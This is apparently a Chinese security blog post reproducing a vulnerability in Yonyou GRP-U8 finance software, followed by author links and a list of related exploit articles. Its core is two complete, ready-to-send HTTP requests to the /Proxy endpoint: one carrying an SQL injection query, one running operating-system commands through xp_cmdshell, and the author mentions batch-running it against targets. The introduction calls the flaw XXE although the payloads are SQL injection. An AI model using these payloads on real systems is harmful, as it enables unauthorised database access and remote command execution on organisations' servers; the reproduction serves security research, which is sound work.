x友GRP-u8 注入-RCE漏洞复现
用友GRP-u8 注入-RCE漏洞复现
一、漏洞简介
用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。
二、漏洞复现
SQL注入POC
POST /Proxy HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 371cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
验证过程
批量跑了一部分(这个是HW期间第一时间跑的)现在估计没啥了
Rce注入EXP
POST /Proxy HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 355cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
参考:
https://www.cnblogs.com/0day-li/p/13652897.html
https://www.uedbox.com/post/14953/
https://www.cnblogs.com/Yang34/p/13653960.html
注意:⚠️
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
thelostworld
开发、安全 学习-工作记录
79篇原创内容
公众号
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
个人博客园:https://www.cnblogs.com/thelostworld/
FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article
语雀博客主页:https://www.yuque.com/thelostworld
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
x友GRP-u8 注入-RCE漏洞复现相关推荐
- 用友php漏洞,用友GRP-u8 注入-RCE漏洞复现
用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导 ...
- 用友u8 注入RCE漏洞利用数据
一.漏洞成因 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.用于SQL注入的POC POST /Proxy HTTP/1.1H ...
- 用友GRP-u8 注入-RCE漏洞
用友GRP-u8 注入-RCE漏洞 工作中遇到的漏洞,基于前人的复现教程成功复现,记录下自己的复现笔记,如有侵权,请联系我删除 漏洞详情 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家 ...
- 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记
禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...
- CVE-2019-15107 webmin RCE漏洞复现
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webadmin RCE漏洞复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成 ...
- thinkphp 5.0.23 rce漏洞复现
thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速.兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相 ...
- 瑞友天翼应用虚拟化系统RCE漏洞复现+利用
1.产品简介 瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台.它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可 ...
- 用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0x01 产品简介 用友NC是一款企业级ERP软件.作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计.采购管理.销售管理.物料管理.生产计划和人力资源管理等,帮助企业实现数字化转 ...
- (2022年12月最新)SpringBoot远程代码执行whitelabel error page SpEL RCE漏洞复现
1. 漏洞原理 spring boot 处理参数值出错,流程进入org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 ...
最新文章
- LaTex in Markdown
- 关于Django的时区设置TIME_ZONE,USE_TZ的问题
- 记录一次缓存系统的优化过程
- php transport,PHPMailer - PHP email transport class
- CoreOS上的Fleet,第二部分
- 多线程之CountDownLatch和CyclicBarrier的区别和用法
- Vue.use自定义自己的全局组件
- Java中private、protected、public和default的区别
- 【SimuPy】Python实现的Simulink 文档翻译全部完毕
- 中英文对照 —— 几何(数学)
- error LNK2005: public: virtual __thiscall CMemDC::~CMemDC(void) (??1CMemDC@@UAE@XZ) already de
- End-to-end 3D Point Cloud Instance Segmentation without Detection
- PS常用案例步骤详解,自学 Photoshop 2022 Mac版——笔记 3实战PS做练习题
- 四川一度智信:如何做好电商?
- 搭建属于自己的基于ChatGPT的微信聊天机器人(方法)
- 如约而至 | 云和恩墨大讲堂电子期刊第五期
- AI智能分析在智慧电厂的典型应用
- 自动控制原理_卢京潮_根轨迹法(复域分析)_学习笔记
- [NLP]如何安装繁简转换工具:opencc
- vue 使用自定义字体
热门文章
- BZOJ_1022_[SHOI2008]_小约翰的游戏John_(博弈论_反Nim游戏)
- 现货、期货、期权、权证
- 汉语字典APP开发总结
- echart 热搜词云(字符云)的制作以及遇到颜色不会随即变得bug
- 如何快速剪辑多个视频,将视频分段保存导出播放
- fd leak问题查找(Android)
- android从九宫格全屏预览,仿微信朋友圈展示图片的九宫格图片展示控件,支持点击图片全屏预览大图...
- android 4.4官方下载,安卓系统电脑版-android x86 4.4 iso下载官方最新版【pc版】-西西软件下载...
- 试用期离职,该如何解释?
- 奋斗吧,程序员——第二十四章 想佳人、妆楼凝望,误几回、天际识归舟